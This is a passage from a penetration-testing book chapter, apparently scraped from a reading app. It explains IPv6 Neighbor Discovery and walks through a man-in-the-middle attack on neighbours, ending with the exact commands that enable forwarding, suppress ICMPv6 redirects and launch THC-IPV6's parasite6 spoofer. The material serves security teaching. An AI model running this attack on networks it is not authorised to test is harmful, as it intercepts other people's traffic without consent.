Hands-On Penetration Testing on Windows
上QQ阅读APP看书,第一时间看更新

IPv6 man-in-the-middle – attacking your neighbors

By now, you've probably had enough ARP to give you a headache. Don't worry, IPv6 has a different process for resolving link layer addresses to IPv6 addresses. However, it seems the designers didn't want us to be bored – we can still spoof and manipulate the procedure, just as in IPv4 and ARP, thus establishing a man-in-the-middle condition. Let's take a look at how the Neighbor Discovery Protocol (NDP) resolution works in IPv6, and then we'll attack it with THC-IPV6's parasite6.

You'll recall from sniffing ARP traffic that there are two parts: who has <IP address>? Tell <host> and <IP address> is at <MAC address>. In IPv6, these two parts are called, respectively, neighbor solicitation (NS) and neighbor advertisement (NA). First, the node with the query sends an NS message to the ff02::1 multicast address. This is received by all nodes on the segment, including the subject of the NS query. The subject node then replies to the requestor with an NA message. All of these messages are carried over ICMPv6.

It's that straightforward. The method is a little different in how replies are processed, however. In IPv4 ARP, replies that map a link-layer address to an IP address can be broadcast without solicitation, and nodes on the segment will update their tables accordingly. In other words, the attacker can preempt any resolution request, so the target never identifies itself as the correct address. In IPv6 ND, the target system will reply to the NS with an NA directed at the requestor; in short, the requestor ends up receiving two NA messages, for the same query, but pointing to two different link-layer addresses, one of which is the attacker. Fun, right? Here's where you'll chuckle: by setting the ICMPv6 override flag, we tell the recipient to – you guessed it – override any previous messages. The requestor will get two answers: hi, I'm the device you're looking for followed immediately by, don't listen to that guy, it's actually me.

Our handy NDP spoofer is called parasite6. Yes, we need to set up packet forwarding so that traffic actually gets through our interface once the spoofing begins; but there's another setup step required: suppression of ICMPv6 redirects. There are certain scenarios in which a device forwarding IPv6 traffic (that would be you, the attacker) has to send back a redirect to the source, effectively telling the source to send traffic somewhere else.

There are certain conditions that will trigger this, including forwarding traffic out the same interface through which it was received – oops. So, we'll set up an ip6tables rule as well. Our friendly parasite6 tool is nice enough to remind us at launch, just in case we forgot.

Keep an eye out for that pesky number 6 when working with these protocols:  ping -6, nmap -6, and ip6tables instead of iptables, and so on.  There is a lot of conceptual and functional overlap, so be careful.
# sysctl -w net.ipv6.conf.all.forwarding=1
# ip6tables -I OUTPUT -p icmpv6 --icmpv6-type redirect -j DROP
# atk6-parasite6 -l -R wlan0

The following screenshot illustrates the output of the preceding commands:

Now, the attack is active and you can progress to the next stage of intercept and manipulation.